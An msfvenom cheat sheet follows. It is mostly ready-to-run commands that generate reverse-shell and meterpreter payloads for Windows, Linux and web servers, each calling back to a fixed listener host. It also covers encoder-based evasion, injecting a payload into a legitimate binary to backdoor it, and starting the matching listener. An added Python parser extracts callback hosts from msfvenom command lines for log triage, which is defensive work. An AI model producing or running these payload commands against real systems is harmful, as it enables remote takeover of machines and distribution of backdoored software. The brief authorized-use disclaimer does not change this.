msfvenom Cheat Sheet
Generate and encode standalone payloads (reverse shells, shellcode, MSI/EXE/ELF) for authorized exploitation.
Overview
msfvenom is Metasploit's payload generator. It combines payload selection, encoding, and output formatting in one command. Use it to build reverse/bind shells in any format (EXE, ELF, MSI, PHP, ASPX, raw shellcode). Pair a reverse payload with a matching multi/handler listener in msfconsole.
Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

Discover payloads and options
List payloads (filter as needed)
msfvenom -l payloads | grep meterpreter
List output formats (exe, elf, raw, ...)
msfvenom -l formats
List encoders
msfvenom -l encoders
Show a payload's required options
msfvenom -p windows/x64/meterpreter/reverse_tcp --list-options

Windows payloads
64-bit meterpreter EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=443 -f exe -o shell.exe
Stageless plain reverse shell EXE
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f exe -o rev.exe
MSI (AlwaysInstallElevated)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f msi -o evil.msi
DLL for sideloading/hijack
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=443 -f dll -o evil.dll

Linux / web payloads
Linux 64-bit reverse shell ELF
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f elf -o shell.elf
PHP reverse shell
msfvenom -p php/reverse_php LHOST=10.10.14.5 LPORT=443 -f raw -o shell.php
JSP reverse shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f raw -o shell.jsp
ASPX webshell payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=443 -f aspx -o shell.aspx

Shellcode (for exploit dev)
C shellcode, bad chars removed
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f c -b '\x00\x0a\x0d'
Python shellcode var named sc
msfvenom -p linux/x86/exec CMD=/bin/sh -f python -v sc

Encoding & evasion
5 iterations of shikata_ga_nai
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=443 -e x86/shikata_ga_nai -i 5 -f exe -o enc.exe
Modern AV detects shikata; rely on it for bad-char avoidance, not evasion.
Inject payload into a legit template binary (-x), keep functionality (-k)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=443 -x /usr/share/windows-binaries/plink.exe -k -f exe -o backdoored.exe

Catch the shell
One-line multi/handler matching your payload
msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST 10.10.14.5; set LPORT 443; run"

Tips
- The handler payload, LHOST, and LPORT must match the generated payload exactly.
- Use staged payloads (.../meterpreter/reverse_tcp) when bandwidth is fine; use stageless payloads (underscore form, e.g. shell_reverse_tcp) when the stager is blocked.
- 443 and 53 are good LPORT choices — they're commonly allowed outbound.
- Set bad chars with -b when writing into a buffer-overflow exploit.
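
For triage of shell history or process-creation logs, the following added example (not part of the original cheat sheet or of Metasploit) parses msfvenom command lines in the syntax shown above and extracts the payload, callback host and port, format and output file. The function names and the SAMPLE lines are constructed for illustration.

```python
import shlex

# msfvenom flags from the cheat sheet that take a value -> field name.
VALUE_FLAGS = {"-p": "payload", "-f": "format", "-o": "output", "-e": "encoder",
               "-i": "iterations", "-b": "badchars", "-x": "template", "-v": "var_name"}

SAMPLE = [  # constructed shell-history lines, not real telemetry
    "sudo /usr/bin/msfvenom -p windows/x64/meterpreter/reverse_tcp "
    "LHOST=10.10.14.5 LPORT=443 -f exe -o shell.exe",
    "msfvenom -p linux/x86/exec CMD=/bin/sh -f python -v sc",
    "msfvenom -l payloads | grep meterpreter",
    "ls -la /tmp",
]

def parse_msfvenom(cmdline):
    """Return a dict describing one msfvenom invocation, or None if absent."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:              # unbalanced quotes in a truncated log line
        argv = cmdline.split()
    # Match the binary by basename so sudo prefixes and full paths still hit.
    start = next((i for i, a in enumerate(argv)
                  if a.rsplit("/", 1)[-1] == "msfvenom"), None)
    if start is None:
        return None
    info = {"datastore": {}, "keep_template": False}
    args, i = argv[start + 1:], 0
    while i < len(args):
        arg = args[i]
        if arg in ("|", ";", "&&", "||", ">"):   # rest belongs to another command
            break
        if arg in VALUE_FLAGS and i + 1 < len(args):
            info[VALUE_FLAGS[arg]] = args[i + 1]
            i += 1                                # skip the consumed value
        elif arg == "-k":
            info["keep_template"] = True
        elif "=" in arg and not arg.startswith("-"):
            key, value = arg.split("=", 1)        # payload options: LHOST=..., CMD=...
            info["datastore"][key.upper()] = value
        i += 1
    return info

def callback_indicators(lines):
    """Unique (LHOST, LPORT, payload) tuples to hunt for in proxy/firewall logs."""
    found = set()
    for line in lines:
        info = parse_msfvenom(line)
        if info and "LHOST" in info["datastore"]:
            ds = info["datastore"]
            # 4444 is Metasploit's default LPORT when none is given.
            found.add((ds["LHOST"], ds.get("LPORT", "4444"), info.get("payload", "")))
    return sorted(found)
```

Running callback_indicators(SAMPLE) yields the single callback endpoint from the first line; the exec payload and the listing command parse but contribute no network indicator.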